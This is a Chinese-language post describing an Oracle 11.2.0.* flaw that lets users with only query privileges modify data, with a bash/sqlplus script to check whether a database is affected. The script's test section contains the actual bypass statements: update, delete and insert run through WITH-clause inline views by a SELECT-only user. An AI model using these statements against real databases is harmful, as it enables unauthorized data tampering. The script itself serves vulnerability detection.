Oracle高危安全漏洞：具有查询权限用户可绕开安全限制进行数据修改

数据库版本 11.2.0.*

检查数据库是否存在此bug的脚本:

Oracle用户执行此脚本

#!/bin/bash
# Usage: 检查ORACLE数据库是否存在高危安全漏洞(具有查询权限用户可绕开安全限制进行数据修改)
# EX: /bin/bash checkbug.sh > ./checkbug_dbIP.log
# Author: AlfredZhao
# Version: 1.0.0

echo -e "\n ***** CHECK: OS info *****\n"
uname -a

echo -e "\n ***** CHECK: OPatch inventory info *****\n"
export PATH=$ORACLE_HOME/OPatch:$PATH

opatch version

opatch lsinventory

echo -e "\n ***** CHECK: DB Test *****\n"
sqlplus -s / as sysdba <<EOF

prompt 1. DB Version:
select * from v\$version;

prompt 2. Judge:
prompt create dba user(test);
create user test identified by Test0619test;
grant dba to test;
conn test/Test0619test
show user
create table t(id number);
insert into t values(1);
insert into t values(1);
insert into t values(1);
insert into t values(1);
insert into t values(1);
commit;
select * from t;

prompt create normal user(test_update);
conn /as sysdba
show user
create user test_update identified by Test0619test;
grant create session to test_update;
grant select on test.t to test_update;
select count(*) from test.t; 

prompt Test normal user privilege.
conn test_update/Test0619test
show user
select * from test.t where rownum = 1;
update (with tmp as (select id from test.t) select id from tmp) set id=10 where id = 1;
commit;
delete (with temp as (select * from test.t) select id from temp) where id = 2;
commit;
insert into (with temp as (select * from test.t) select * from temp) select * from test.t where id =1;
commit;
select * from test.t;

prompt Delete test user
conn /as sysdba
show user
drop user test cascade;
drop user test_update cascade;
EOF